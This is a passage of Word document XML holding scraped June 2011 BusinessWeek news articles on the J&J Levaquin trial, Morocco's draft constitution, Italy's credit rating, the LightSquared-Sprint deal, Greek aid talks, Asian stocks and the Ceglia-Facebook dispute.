        <w:t>http://www.businessweek.com/news/2011-06-17/qaddafi-s-forces-fire-rockets-at-libyan-port-city-of-misrata.html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J&amp;J Wins Trial Over Injury Claims Made Against Antibiotic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9:05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Johnson &amp; Johnson Properly Warned of Drug Risk, Lawyer Says MBIA-BofA, Credit Suisse, Bayer, Microsoft in Court News WaMu Settlement Agreement With Shareholders Said to Collapse Credit Suisse, Deutsche Bank, Goldman, UBS in Court News Ex-Barai Analyst Admits Destroying Data After Rajaratnam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Cronin Fisk and Beth Hawkins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trial argument from 13th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Johnson &amp; Johnson properly warned of the risks of its antibiotic Levaquin and isn't responsible for a tendon injury sustained by an 84-year-old man, a Minneapolis jury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Calvin Christensen, who said he ruptured the Achilles tendon in his right foot after taking the drug while hospitalized with pneumonia, sued the company and its Ortho- McNeil Pharmaceutical unit in 2007. Christensen said the companies downplayed the risks of Levaquin to boost the drug's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denied any failure to warn and contended Christensen needed Levaquin to treat the pneumonia. The Minneapolis federal court jury rejected his claim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jury took a good, hard look at all the evidence and correctly concluded that Ortho-McNeil-Janssen Pharmaceuticals, Inc. acted responsibly and properly in disclosing the risks associated with this effective and life-saving medicine," James B. Irwin, a lawyer for the company, said in a statement after the verdict.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Pending Claims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Christensen's case is the second of more than 2,500 pending claims in U.S. courts to go to trial over allegations that Levaquin caused tendon damage in patients and that the company failed to adequately disclose the risk. J&amp;J and Ortho-McNeil lost the first trial when a separate Minneapolis jury awarded $1.8 million to an 82-year-old man who ruptured both Achilles tendons.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Ron Goldser, a lawyer for the plaintiff, said in a brief interview that his side is "disappointed."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trial began June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Food and Drug Administration in 2008 required an upgraded warning on tendon damage by Levaquin and similar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claimed the warning should have been enhanced earlier and that Johnson &amp; Johnson and Ortho-McNeil, now Ortho- McNeil-Janssen, targeted the elderly for drug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Levaquin label "has included warnings about tendinitis and tendon ruptures," since it was first approved by the FDA in 1996, Bill Foster, a J&amp;J spokesman, said in an e-mail before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Levaquin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Levaquin had U.S. sales of $1.3 billion in 2010 and $422 million in the first quarter of 2011. Levaquin, a member of a class of antibiotics called fluoroquinolones, was developed to treat serious and life-threatening infections, Foster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drug has been prescribed more than 430 million times worldwide, company lawyers said in court papers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FDA in 2008 required Johnson &amp; Johnson and makers of other drugs in the class to include a so-called black box or enhanced warning on the risk of tendon ruptures. The risk was higher in patients older than 60, those taking steroids, or who have had kidney, heart or lung transplants, the FDA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J&amp;J was aware of the increased risk before adding the black box warning, Christensen said in his complaint. Regulatory officials in France, Italy and Belgium sent out so-called Dear Doctor letters of the risk of tendon injury among the elderly in 2002, Christensen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Ortho-McNeil upgraded its warning in the U.S. in 2002, adding the increased risk to patients taking steroids, particularly elderly patients, Christensen said. This wasn't enough, because Ortho-McNeil didn't send out Dear Doctor letters in the U.S. about the change and "muted" the additional warning, he said in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Label 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changed the label on its own after reviewing initial data from Europe in 2001, Irwin said today in closing arguments.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how we like to see corporate America do things,"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who took the drug in May 2006, required surgery after rupturing his right Achilles tendon and was left with "permanent instability and loss of balance," according to his complaint. "Even with immobilization for long periods of time and physical therapy, the Achilles tendons in the elderly rarely fully recover," he said in court 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 needed Levaquin to treat his pneumonia, Irwin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‘Risks and Benefits'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medicines have risks and benefits, we all know that," said Irwin said. "A huge benefit outweighs the risk of harm."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Christensen's doctor was aware of the warning of tendon ruptures on the Levaquin label, Irwin said. The doctor prescribed Levaquin to Christensen because "it was important to get him home," Irwin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lots of other drugs available for Calvin," his lawyer, Ronald Goldser, said at trial today. "Did he have an alternative? Of course, he did."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Goldser played a portion of a video deposition of Christensen's doctor, Greg Clark, in his closing argument. In the deposition, Goldser asked Clark if he would have prescribed Levaquin if he knew then what he now knows about the drug.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should have considered alternatives for him," Clark replied.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failed to provide Dr. Clark complete and proper information in a manner intended to attract notice," Goldser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is Christensen v. Johnson &amp; Johnson, 07-03960, combined for trial in In re Levaquin Products Liability Litigation, 08-md-01943, U.S. District Court, District of Minnesota (Minneapolis).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Glenn Holdcraft, Fred Strasser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Cronin Fisk in Southfield, Michigan, at mcfisk@bloomberg.net; Beth Hawkins in Minneapolis at hawkins@visi.com.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Over the Counter Derivatives Loan Modification Business Lawsuits Art Market European Energy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05:14</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>http://www.businessweek.com/news/2011-06-17/j-j-wins-trial-over-injury-claims-made-against-antibiotic.html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Moroccan King Proposes More Power to Lawmakers in Constitution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8:11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King Mohammed of Morocco Announces Constitutional Changes Syria Regime Sends Army Into Northern Town as Residents Flee ZawahiriБ─(tm)s Appointment Shows Al-Qaeda Still a Threat, Gates Says Syrians Flee Second Northern Town as Army Said to Approach Turkey Spurns Aid as Syrian Attacks Forces More to Flee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Aida Alami and Caroline Alexander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&lt;GO&gt; and MET &lt;GO&gt; for more on the regional turmoil.)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Morocco's King Mohammed VI gave more power to lawmakers in a draft constitution drawn up in response to calls for democratic changes in the North African nation and said a referendum will be held on July 1 on the proposal.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constitution will "make Morocco a state that will distinguish itself by its democratic course," King Mohammed said in an address broadcast on television and radio yesterday. The king will no longer name the prime minister, who will be chosen by the party that wins elections and become head of the government. The monarch will maintain the power to overrule or dissolve parliament, which is elected.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Demonstrations calling for a reduction in the king's power began in February, prompting King Mohammed to say in March he would introduce more liberties. While protests haven't reached the scale of the popular movements that toppled governments in Egypt and Tunisia, security forces clashed with protesters on May 29 and one activist in the coastal city of Safi died from injuries.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Feb. 20 youth movement, which has led the protests in Morocco, won't participate in the referendum, said Aymane Aouidi, a member.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nothing new in this proposed constitution," he said in an interview. "Article 19 that we protested in the streets remains," he said, referring to the article which gives all the powers to the king.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Rights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rights will be set according to "international standards" guaranteeing economic and political equality between men and women, transparent justice, freedom of speech and of the press, the king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draft constitution offers a "considerable strengthening" of individual rights, said Nadir El Moumni, a constitutional and political expert at Mohammed V University in Rabat, in a telephone interview. "The King's powers would be reorganized, redeployed in a more strategic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proposed changes include allowing Moroccans to vote abroad, and making Amazigh, spoken by the ethnic Berber minority, an official language in addition to Arabic.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Islam would continue to be the state religion but the nation's 32 million people would have freedom of religion. This proposed change drew criticism from Abdelilah Benkirane, leader of the Justice and Development Party, an Islamist party.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true that His Majesty the King in his March 9 speech gave us assurances on the Islamic identity of the state," he told reporters on June 10, after seeing the draft document. "However, I have fears that it will be undermined."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Religious Leader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king, not technically the head of state, is the country's secular and religious leader. The changes propose the monarch will no longer be considered sacred, though he'd remain inviolable and maintain the role of "commander of the faithful."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Nabil Benabdallah, secretary general of the Progress and Socialism Party, said the changes show Morocco is entering a new era as a parliamentary constitutional monarchy.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will be a new balance of powers," Benabdallah said. "It paves the way toward the establishment of a democratic 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Morocco's economy may expand 4.6 percent this year, compared with 3.3 percent in 2010, according to the state statistics office. Tourism accounts for almost 10 percent of gross domestic product, raising $7 billion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Paul Tighe in Sydney. Editors: Ben Holland, Malcolm Scott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Aida Alami in Cairo at aalami2@bloomberg.net; Caroline Alexander in London at calexander1@bloomberg.net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Paul Tighe at ptighe@bloomberg.net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Marketing to Women Marketing to Moms Micro Finance in India Women in Leadership Advertising in a Recession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04:14</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>http://www.businessweek.com/news/2011-06-17/moroccan-king-proposes-more-power-to-lawmakers-in-constitution.html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Johnson &amp; Johnson Wins Second Trial Over Levaquin Claims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8:25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Johnson &amp; Johnson Properly Warned of Drug Risk, Lawyer Says MBIA-BofA, Credit Suisse, Bayer, Microsoft in Court News WaMu Settlement Agreement With Shareholders Said to Collapse Credit Suisse, Deutsche Bank, Goldman, UBS in Court News Ex-Barai Analyst Admits Destroying Data After Rajaratnam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Cronin Fisk and Beth Hawkins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company comment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Johnson &amp; Johnson properly warned of the risks of its antibiotic Levaquin and isn't responsible for a tendon injury sustained by an 84-year-old man, a Minneapolis jury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Calvin Christensen, who said he ruptured the Achilles tendon in his right foot after taking the drug while hospitalized with pneumonia, sued the company and its Ortho- McNeil Pharmaceutical unit in 2007. Christensen said the companies downplayed the risks of Levaquin to boost the drug's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Johnson &amp; Johnson denied any failure to warn and contended Christensen needed Levaquin to treat the pneumonia. The Minneapolis federal court jury rejected his claim today. Christensen was seeking unspecified compensatory and punitive damages.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jury took a good, hard look at all the evidence and correctly concluded that Ortho-McNeil-Janssen Pharmaceuticals, Inc. acted responsibly and properly in disclosing the risks associated with this effective and life-saving medicine," James B. Irwin, a lawyer for the company said in a statement after the verdict.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Christensen's case is the second of more than 2,500 pending claims in U.S. courts to go to trial over allegations that Levaquin caused tendon damage in patients and that the company failed to adequately disclose the risk. J&amp;J and Ortho-McNeil lost the first trial when a separate Minneapolis jury awarded $1.8 million to an 82-year-old man who ruptured both Achilles tendons.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Ron Goldser, a lawyer for the plaintiff, said in a brief interview that his side is "disappointed."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Food and Drug Administration in 2008 required an upgraded warning on tendon damage posed by Levaquin and similar drugs. Christensen claimed the warning should have been enhanced earlier and that Johnson &amp; Johnson and Ortho-McNeil, now Ortho- McNeil-Janssen, targeted the elderly for drug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Christensen trial began June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lawsuit is Christensen v. Johnson &amp; Johnson, 07-03960, combined for trial in In re Levaquin Products Liability Litigation, 08-md-01943, U.S. District Court, District of Minnesota (Minneapolis).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Glenn Holdcraft, Fred Strasser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Cronin Fisk in Southfield, Michigan, at mcfisk@bloomberg.net; Beth Hawkins in Minneapolis at hawkins@visi.com.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God's MBAs: Why Mormon Missions Produce Leaders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Johnson School at Cornell Transportation Safety Consumer Marketing Pharmaceuticals Companies Second Life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04:14</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>http://www.businessweek.com/news/2011-06-17/johnson-johnson-wins-second-trial-over-levaquin-claims.html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Italy's Aa2 Debt Credit Ratings May Be Reduced by Moody's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7:36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Strengthens After Merkel Agrees to Greek Debt Compromise Greek Bonds Sink, CDS Jump to Record as Default Concern Mounts Greece Credit-Default Swaps Surge to Record 2,189 Basis Points Greek Government Bonds Drop as Bailout Talks Stall; Bunds Rise BNP Paribas, Biggest French Banks May Be Cut by MoodyБ─(tm)s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Timothy R. Homan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Italy's credit ratings may be reduced by Moody's Investors Service because of economic growth challenges, risks associated with efforts to reduce debt and the potential for higher borrowing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third-ranked Aa2 local and foreign-currency government bond ratings were placed under review for a possible downgrade, Moody's said in a statement yesterday. The country's short-term Prime-1 ratings were affirmed.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may have trouble reducing its public debt to more affordable levels as borrowing costs rise and support for the government of Prime Minister Silvio Berlusconi weakens, Moody's said. Investor speculation about a possible Greek default has focused attention on the finances of Italy and other high-debt euro area nations. Italy had to offer 3.9 percent to sell five- year bonds this week, matching March's 2 1/2-year high.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some potential contagion problems going on now in Europe," Jay Bryson, a senior global economist at Wells Fargo Securities LLC in Charlotte, North Carolina, said in an interview. Italy's "debt dynamics look a little shaky as well. They also have a growth problem there."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had debt of about 1.8 trillion euros ($2.6 trillion) at the end of last year and a ratio of debt to gross domestic product of about 119 percent. The International Monetary Fund yesterday projected Italy's economy would expand 1 percent this year, down from 1.3 percent in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ratings review will focus on the growth prospects for the euro region's third-largest economy and the outlook for a removal of structural bottlenecks that could hinder a medium- term economic recovery, Moody's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‘Growth Challenges'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economy faces growth challenges in an environment characterized by long-term structural impediments to growth," Moody's said in yesterday's statement. "The fragile market sentiment that continues to surround European sovereigns with high levels of debt poses additional risks for Italy."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officials are in the midst of discussing how to provide additional funding for Greece and get the private sector involved without triggering a default. Greek Prime Minister George Papandreou's failure to win support for more austerity is fueling speculation of a default that would infect Europe's banking system and credit markets beyond the region.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this environment of some uncertainty and questions around the resolution of the management of the euro-zone debt crisis, which is a factor," Alexander Kockerbeck, a Moody's Investors Service sovereign-debt analyst, said in a telephone interview. He said that the crisis "can have consequences" for countries like Italy where "economic growth is relatively low, and borrowing costs can increase in that environment."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IMF Warning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Monetary Fund chief economist Olivier Blanchard said at a press conference yesterday that a failure to agree on measures or funding for countries at the "periphery" of the euro region could lead to a sovereign defaults and derail the world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another piece of negative news here," Bryson said. "Is that going to change the political dynamic in Greece? No, I don't think it has any effect."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Yesterday's announcement follows a similar move by Standard &amp; Poor's last month. Italy had its credit-rating outlook lowered to negative from stable by S&amp;P, which cited the nation's slowing growth and "diminished" prospects for a reduction of government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S&amp;P affirmed the country's A+ long-term rating, the fifth highest, and its top-ranked A-1+ short-term rating, the company said in a May 20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Growth Outlook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economy expanded 0.1 percent in the first quarter, less than economists had estimated, as gains in exports failed to offset weak domestic demand. The economy won't return to its pre-recession level for at least another two years, and the $2.3 trillion economy needs to raise productivity, the OECD said last month in a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Berlusconi, reeling from two electoral defeats in two weeks, wants to win back voters with tax cuts that threaten to split his Cabinet and inflate the euro region's second-biggest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Berlusconi and his Northern League allies have stepped up talk of tax cuts after losing lost control of key cities, including Milan, in regional elections last month. Berlusconi suffered a further setback this week when almost 60 percent of eligible Italians voted to overturn a series of policy initiatives, the first referendum to achieve the necessary 50 percent participation threshold since 1995.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Christopher Wellisz,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Timothy R. Homan in Washington at thoman1@bloomberg.net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Christopher Wellisz at cwellisz@bloomberg.net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Credit-Rating Agency Reform Small Business Debt Debt Workouts Debt Settlement Sovereign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03:14</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>http://www.businessweek.com/news/2011-06-17/italy-s-aa2-debt-credit-ratings-may-be-reduced-by-moody-s.html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Falcone's LightSquared, Sprint Reach 15-Year Network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7:24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RBC Said to Near Sale of U.S. Bank Unit to PNC Financial AngieБ─(tm)s List Is Said to Pick BofA to Handle Planned August IPO Capital One Said to Near $9 Billion Deal for ING Direct USA Goldman Adds Barnard College President Debora Spar to Board Citigroup Hires Hoover for Capital Markets Origination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Greg Bensinger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analyst's comment in 11th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Billionaire Philip Falcone's LightSquared Inc. reached a 15-year deal with Sprint Nextel Corp. to share network expansion costs and equipment, and to provide high-speed wireless service to the phone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Falcone told Harbinger Capital Partners hedge fund investors about the accord in a letter today obtained by Bloomberg News. The companies were discussing a deal valued at as much as $20 billion, people familiar with the matter said earlier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and Sprint will jointly develop, deploy and operate LightSquared's 4G LTE network," according to the letter. "Sprint will become a significant customer of LightSquared's 4G LTE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is an important step forward for Falcone, whose effort to challenge Verizon Wireless and AT&amp;T Inc. was met with skepticism after plans for LightSquared emerged in government filings about 15 months ago. Falcone is gambling more than 60 percent of his hedge fund on LightSquared.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deal is a huge positive for Harbinger investors simply because it represents such a large proportion of his hedge fund," said Don Steinbrugge, managing partner of Agecroft Partners LLC, a Richmond, Virginia-based firm that advises hedge funds and investors. "It's a step in the right direction given all the uncertainty surrounding this investment."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Sprint's Challenge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Sprint, the deal would provide a new source of revenue as the third- largest U.S. wireless company struggles to compete with bigger rivals. AT&amp;T is trying to acquire Deutsche Telekom AG's T-Mobile USA unit, which would let it pass Verizon Wireless to become the country's No. 1 wireless operator. Sprint Chief Executive Officer Dan Hesse is fighting to block the deal, which needs government approval, arguing it would stifle competition.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 which has lost contract customers in 14 of the past 15 quarters, has pledged $5 billion to upgrade its network over the next three to five years. The company can use LightSquared's network to lessen the load on its own network as data demand has skyrocketed, an issue that has plagued other carriers.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Hesse said last month Sprint was in talks with Clearwire Corp. on a similar network deal. Kirkland, Washington-based Clearwire provides Sprint's fourth- generation wireless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Overland Park, Kansas-based Sprint fell 2 cents to $5.19 at 4:15 p.m. in New York Stock Exchange composite trading. The shares have gained 23 percent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GPS Questions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CEO Sanjiv Ahuja said in a June 10 televised interview with "Bloomberg West" that his company had held discussions with Sprint. Bill White, a Sprint spokesman, and Steve Bruce, a spokesman for New York-based Harbinger, declined to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gets LightSquared to their goal of nationwide coverage much more quickly than if they were going to build it out on their own," Chris Larsen, a Piper Jaffray &amp; Co. analyst in New York,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Communications Commission has asked that LightSquared study whether its network interferes with global- positioning systems. The company has commissioned a study of the issue, due July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will have to resolve these issues with GPS before Sprint can make full use of that extra capacity," said Larsen, who rates Sprint "overweight."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Satellite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Separately, LightSquared will announce as soon as next week it will begin soliciting bids to sell wireless service from its satellite to governments or other agencies to help supplement their earth-based emergency and first- responder networks, said a person familiar with the matter.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satellite service would serve as a backup for the terrestrial networks in the case of emergencies that knock out equipment on the ground, said the person, who declined to be identified because the plans aren't yet public. LightSquared launched the satellite in November.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Saijel Kishan in New York. Editor: Julie Alnwick, Peter Elstrom, Stephen West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Greg Bensinger in New York at gbensinger1@bloomberg.net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Ad Networks Network Neutrality Business Networking Events Social Networking Microsoft-Yahoo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03:14</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>http://www.businessweek.com/news/2011-06-17/falcone-s-lightsquared-sprint-reach-15-year-network-deal.html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EU Prepares New Greek Aid Deal as Merkel Backs ECB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6:58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Merkel Heeds ECB on Greece Saying Bondholder Role Voluntary MerkelБ─(tm)s Greek Bondholder Gambit Tested as Sarkozy Visits Papandreou Reshuffle Fuels Allies Dissent as Markets Tumble Greece Aid Talks Deadlock as Pressure on Papandreou Builds Greek Rescue May Be Delayed by Divisions on InvestorsБ─(tm)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Rainer Buergin and Francine Lacqua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euro trading in ninth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European Union officials moved closer to hammering out a new aid package for Greece after Germany agreed to work with the European Central Bank to make sure plans to include private investors in a rescue don't trigger a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bonds gained and the cost of insuring the country's debt against default tumbled yesterday after German Chancellor Angela Merkel withdrew her demand that bondholders be forced to shoulder a "substantial" burden in a rescue. She said she would work with the ECB to ensure the role of private investors remains voluntary to avoid triggering a default rating.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 like to have a participation of private creditors on a voluntary basis," Merkel told reporters in Berlin at a joint press conference with French President Nicolas Sarkozy. This "should be worked out jointly with the ECB and there shouldn't be any dispute with the ECB on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 bonds and the euro all gained on the prospect that Merkel's shift would facilitate a new deal for Greece, which faces a 30 billion-euro ($43 billion) funding gap next year. European Union finance chiefs meet in Luxembourg on June 19 to try to advance a package to plug that hole, a shortfall that prompted the International Monetary Fund to threaten to withhold its share of a 12 billion-euro bailout payment from the original package due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‘Coordinated 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thing is for sure, time is ticking, and prompt and coordinated action needs to be taken," said Markus Ernst, a strategist at UniCredit SpA in Munich. "Contagion to other over-indebted EU member countries is still considered high and cannot be ruled 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said she was now willing to accept that the so- called Vienna initiative of 2009, which encouraged creditors to roll over expiring bonds, could be a model for private-investor participation in the new aid package.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marked a reversal from the position set out by her finance minister, Wolfgang Schaeuble, who had insisted that Greek bond maturities be extended by seven years. That approach met ECB resistance and led to credit-rating company warnings that the move was tantamount to default, stalling efforts to craft an aid package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Paying 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Merkel now willing to work with the ECB, ministers at the Luxembourg meeting will probably "find an agreement that the IMF and the Europeans can pay out the next tranche to Greece, given that the key ingredients of the next program are known," Schaeuble's deputy for economic, financial and European affairs, Joerg Asmussen, said in a Bloomberg Television interview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yield on Greece's two-year bond, which topped 30 percent for the first time on June 16, fell 98 basis points to 28.79 percent. Credit-default swaps on Greece fell to 1,932.75 basis points, having risen as high as 2,237 basis points on June 16, according to CMA. The signs of flexibility from Germany sent the euro up as much as 1 percent to $1.4306.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Merkel's government wants the private-sector involvement to be "voluntary, substantial, reliable and quantifiable," Asmussen said. Merkel and Schaeuble are "on the same page" and working with the ECB to make it happen,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Cabinet Reshuffle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announcement came as Greek Prime Minister George Papandreou announced a Cabinet reshuffle that included replacing Finance Minister George Papaconstantinou, in a bid to get rebelling allies to back the 78 billion- euro austerity plan that the EU and IMF have made a condition for new aid. Papandreou named Evangelos Venizelos, his defense minister and a former rival for leadership of the ruling Socialist party, to replace Papaconstantinou.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Papandreou then called for a vote of confidence in his new government, which will probably be held the evening of June 21, after three days of debate.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estimates put Greece's 2012-14 financing gap at as much as 170 billion euros. It would be filled by about 45 billion euros of loans, plus around 57 billion euros in unspent aid from the 2010 bailout, roughly 30 billion euros in asset- sale proceeds and about 30 billion euros from creditors.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year after the bailout that aimed to stop the spread of the debt crisis, Greece remains mired in a third year of recession, shut out of financial markets and saddled with the biggest debt load in the euro's history. Portugal and Ireland have followed in seeking bailouts, and risk premiums on Spanish and Italian debt have also been rising.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Pressure on euro-area governments to craft a rescue plan intensified this week after Standard &amp; Poor's slapped Greece with the world's lowest credit rating. Moody's placed the ratings of BNP Paribas, France's biggest bank, and local rivals Societe Generale SA and Credit Agricole under reviews that will focus on their holdings of Greek public and private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Gregory Viscusi in Paris and James G. Neuger in Brussels. Editors: Andrew Davis, Eddie Buckle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Rainer Buergin in Berlin at rbuergin1@bloomberg.net; Francine Lacqua in London at flacqua@bloomberg.net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James Hertling at jhertling@bloomberg.net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New Zealand Business Mortgage-backed securities Microsoft- Yahoo Deal Microsoft European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02:14</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>http://www.businessweek.com/news/2011-06-17/eu-prepares-new-greek-aid-deal-as-merkel-backs-ecb-approach.html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Asian Stocks Post Longest Series of Weekly Losses Since 2004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6:56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Asian Stocks Slump as Europe Crisis Deepens Amid Greek Rioting Chimei, Haier, HPI, Hyundai, Vista: Asia Ex-Japan Stock Preview Japanese Stock Futures Fall on Greek Debt Threat, U.S. Economy Asian Stocks Swing Between Gains, Losses Amid Europe Deadlock Japanese, Australian Stock Futures Gain on U.S. Retail Sales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Jonathan Burgos and Shani Raja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18 (Bloomberg) - Asian stocks tumbled, dragging the region's key benchmark index to its longest series of weekly losses in seven years, on concern faltering U.S. economic growth and Greece's worsening sovereign debt crisis will derail the global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Esprit Holdings Ltd., the Hong Kong-based clothier that counts Europe as its biggest source of revenue, slumped 8.2 percent this week. LG Electronics Inc., the world's third- biggest mobile phone maker by sales, plunged 8.3 percent in Seoul. Toyota Motor Corp., the world's No. 1 carmaker, dropped 3.8 percent in Tokyo after forecasting a drop in profit as Japan's record earthquake disrupted production.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Asia Pacific Index declined 1.9 percent to 129.60 this week amid concern the global economic recovery may be derailed as manufacturing in New York unexpectedly shrank and Greek Prime Minister George Papandreou fired his finance minister in a Cabinet overhaul aimed at fending off a party rebellion and ensuring the passage of austerity measures needed for a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still get nightmares from the events of 2008 and nobody wants to see an encore," said Prasad Patkar, who helps manage about $1.7 billion at Platypus Asset Management Ltd. in Sydney. "Europe has the potential to set off another global credit crisis, which is the biggest worry."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Japan's Nikkei 225 Stock Average slid 1.7 percent this week. South Korea's Kospi index dropped 0.7 percent. Australia's S&amp;P/ASX 200 Index fell 1.7 percent. Hong Kong's Hang Seng Index declined 3.2 percent. The gauge entered a so-called correction on June 16 after falling more than 10 percent from its recent high on April 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 Deadlock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Shanghai Composite Index declined 2.3 percent after the central bank ordered lenders to set aside more cash as reserves after inflation accelerated to the fastest pace in almost three years in May.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MSCI Asian gauge's seven-week slump exceeded a six-week streak of declines in the aftermath of the collapse in Lehman Brothers Holdings Inc. in 2008, on speculation Greece will default on its debt payments.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Federal Reserve Chairman Alan Greenspan said that a default by Greece is "almost certain" and could drive the U.S. economy into recession following the failure of European Union officials to break a deadlock on negotiations for a second Greek aid plan.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problem you have is that it's extremely unlikely the political system will work" in a way that solves Greece's crisis, Greenspan, 85, said in an interview with Charlie Rose in New York on June 16. "The chances of Greece not defaulting are very small."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‘Riot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Esprit plunged 8.2 percent through the week to HK$25.65 in Hong Kong. Cosco Pacific Ltd., which operates container facilities at Piraeus, Greece's largest port, dropped 5.3 percent to HK$13.24. Canon Inc., a camera maker that counts Europe as its market, decreased 2 percent to 3,690 yen in Tokyo.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another riot point in markets with the EU debt crisis intensifying and growth losing significant momentum," said Nader Naeimi, a Sydney-based strategist for AMP Capital Investors Ltd., which has almost $100 billion under management. "It looks like there's still more downside in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Exporters dropped after reports showed manufacturing in the New York region unexpectedly shrank in June and confidence among U.S. homebuilders slumped to the lowest level in nine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 in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LG Electronics, which gets about 30 percent of sales from the U.S., fell 8.3 percent to 79,800 won in Seoul. Li &amp; Fung Ltd., the world's biggest supplier of toys to retailers including Wal-Mart Stores Inc. and Target Corp., tumbled 12 percent to HK$14.14 in Hong Kong. Honda Motor Co., a carmaker that counts North America as its main source of revenue, lost 1.9 percent to 2,927 yen in Tokyo.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HTC Corp., the Taiwanese maker of smartphones that use operating systems from Google Inc. and Microsoft Corp., slumped 14 percent to NT$998. Macquarie Group Ltd. on June 15 lowered its rating on the stock to "neutral" from "outperform," saying competition from makers of low-cost handsets will increase. UBS AG removed the stock on its list of preferred technology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Samsung Electronics Co., the world's second-biggest maker of mobile phones by sales, fell 3.8 percent to 819,000 won. Research In Motion Ltd., whose BlackBerry phones are losing market share to Apple Inc.'s iPhone, said on June 16 quarterly revenue may drop for the first time in nine years.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 of Worry'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really a wall of worry out there at the moment," said Matt Riordan, who helps manage close to $7 billion in Sydney at Paradice Investment Management Pty. "It's hard to build an optimistic story. The one ray of hope may be the extent to which this is a lull that's been caused by temporary issues."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Toyota Motor Corp., the world's biggest automaker, declined 3.8 percent to 3,175 yen. The company said on June 10 net income may fall 31 percent to 280 billion yen ($3.5 billion) in the year ending March 31 from a year earlier after Japan's record earthquake disrupted production and sales. The company said yesterday it's working with parts makers to restore supply of 30 types of components.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Nikkei has plunged 10 percent since March 10, the day before the magnitude-9 earthquake and tsunami that devastated Japan's northeastern coast, triggering the worst nuclear accident in 25 years, disrupting supply chains, and leaving more than 23,000 people dead or missing.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 Reconstruction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reconstruction policy isn't moving ahead," said Naoteru Teraoka, general manager at Tokyo-based Chuo Mitsui Asset Management Co., which oversees about $28 billion. "Even before the quake, the domestic economy was weak and you had a lot of firms dependant on overseas markets. Now, with government in such confusion, investing in the domestic market makes even less sense."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Prime Minister Naoto Kan's ruling Democratic Party of Japan on June 15 proposed scaling back a second disaster reconstruction package to 2 trillion yen ($25 billion), or half of the size of the first one. Kan two weeks ago survived a no- confidence vote by pledging to resign once the crisis from the March earthquake and the meltdowns at Tokyo Electric Power Co.'s Fukushima Dai-Ichi nuclear plant are contained.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Shimizu Corp., Japan's biggest construction company by sales, declined 7.6 percent to 318 yen, leading builders lower. Smaller rival Kajima Corp. sank 4.3 percent to 222 yen. Obayashi Corp. plunged 5.9 percent to 336 yen.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stocks that advanced, Tokyo Electric surged 59 percent to 302 yen, the biggest gain on the MSCI Asia Pacific Index. The Tokyo Stock Exchange raised the collateral requirement for short sales of the utility to 50 percent from 30 percent, discouraging speculators by making the trade more expensive.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utility has lost 86 percent of its value since its Fukushima Dai-Ichi nuclear plant was destroyed on March 11. Tokyo Electric is the worst- performing stock on the Nikkei 225 Stock Average since the quake.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Akiko Ikeda in Tokyo. Editors: Jason Clenfield,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Jonathan Burgos in Singapore at jburgos4@bloomberg.net; Shani Raja in Sydney at sraja4@bloomberg.net.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Gentle at ngentle2@bloomberg.net.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Stock Market Stock Options Stock Investing Haas School of Business The Economy of Southeast Asia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02:14</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>http://www.businessweek.com/news/2011-06-17/asian-stocks-post-longest-series-of-weekly-losses-since-2004.html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Facebook Claimant Passed Lie-Detector Test, His Lawyers Say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6:30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Jiau Jury Begins Deliberations on Insider-Trading Charges Oracle Seeks Б─≤BillionsБ─(tm) From Google in Java Patent Lawsuit MBIA-BofA, Credit Suisse, Bayer, Microsoft in Court News Credit Suisse, Deutsche Bank, Goldman, UBS in Court News Ex-Barai Analyst Admits Destroying Data After Rajaratnam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Bob Van Voris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excerpt from court papers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Paul Ceglia, who says a 2003 contract entitles him to half the Facebook Inc. holdings of Mark Zuckerberg, the company's co- founder and chief executive officer, passed a lie-detector test on his claim, his lawyers said in a court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Ceglia, 37, "submitted to a polygraph examination that focused on the core issue in this case - the authenticity of the work-for-hire agreement - and the test showed ‘no deception' was indicated," lawyers for the western New York man said in the court filing.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disclosure was contained in papers filed today by Ceglia's lawyers opposing Facebook's request that it be allowed to immediately inspect the original of the alleged contract and the e-mails Ceglia claims he exchanged with Zuckerberg, before being required to turn over any evidence to Ceglia.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June 2 request, Facebook called Ceglia "a hustler" engaged in various swindles. The company said Ceglia's claimed contract is "an amateurish forgery" and the e-mails fabricated.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today's filing, Ceglia's lawyers ask the court to order both sides to turn over evidence to determine whether the contract is genuine and to order the parties into mediation.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Ceglia v. Zuckerberg, 1:10-cv-00569, U.S. District Court, Western District of New York (Buffalo).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Fred Strasser, Glenn Holdcraft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Bob Van Voris in U.S. District Court in Manhattan at rvanvoris@bloomberg.net.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Facebook Advertising Retirement Strategies Gates Foundation Corporate Legal Departments Obama's Healthcare Reform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02:14</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
